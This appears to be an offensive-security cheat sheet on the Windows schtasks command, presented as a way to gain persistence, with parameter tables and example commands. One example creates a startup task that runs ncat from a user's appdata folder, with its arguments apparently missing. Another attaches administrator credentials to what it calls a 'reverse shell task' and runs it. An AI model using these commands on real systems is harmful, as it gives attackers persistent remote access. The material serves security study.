# Scheduled Tasks A great way to achieve persistence. ## Display Syntax

Parameter	Description
	Performs a local or remote host search to determine what scheduled tasks exist. Due to permissions, not all tasks may be seen by a normal user.
/fo	Sets formatting options. We can specify to show results in the `Table, List, or CSV` output.
/v	Sets verbosity to on, displaying the `advanced properties` set in displayed tasks when used with the List or CSV output parameter.
/nh	Simplifies the output using the Table or CSV output format. This switch `removes` the `column headers`.
/s	Sets the DNS name or IP address of the host we want to connect to. `Localhost` is the `default` specified. If `/s` is utilized, we are connecting to a remote host and must format it as "\\host".
/u	This switch will tell schtasks to run the following command with the `permission set` of the `user` specified.
/p	Sets the `password` in use for command execution when we specify a user to run the task. Users must be members of the Administrator's group on the host (or in the domain). The `u` and `p` values are only valid when used with the `s` parameter.

View the host's existing scheduled tasks. ```powershell # view all scheduled tasks schtasks /Query /V /FO list # query a specific task schtasks /query /tn "My Task" /V /fo list ``` ## Create Syntax

Parameter	Description
/sc	Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the options parameters.
/tn	Sets the name for the task we are building. Each task must have a unique name.
/tr	Sets the trigger and task that should be run. This can be an executable, script, or batch file.
/s	Specify the host to run on, much like in Query.
/u	Specifies the local user or domain user to utilize
/p	Sets the Password of the user-specified.
/mo	Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day.
/rl	Allows us to limit the privileges of the task. Options here are `limited` access and `Highest`. Limited is the default value.
/z	Will set the task to be deleted after completion of its actions.

For creating a new scheduled task we must specify, at a minimum, the following: * `/create` : to tell it what we are doing * `/sc` : we must set a schedule * `/tn` : we must set the name * `/tr` : we must give it an action to take {% code overflow="wrap" %} ```powershell schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\\appdata\local\ncat.exe

" ``` {% endcode %} ## Change Syntax

Parameter	Description
/tn	Designates the task to change
/tr	Modifies the program or action that the task runs.
/ENABLE	Change the state of the task to Enabled.
/DISABLE	Change the state of the task to Disabled.

```powershell # adding credentials to our reverse shell task schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd" # run the task immediately schtasks /run /tn "My Task" ``` ## Delete Syntax

Parameter	Description
/tn	Identifies the task to delete.
/s	Specifies the name or IP address to delete the task from.
/u	Specifies the user to run the task as.
/p	Specifies the password to run the task as.
/f	Stops the confirmation warning.

```powershell schtasks /delete /tn "My Task" /f ```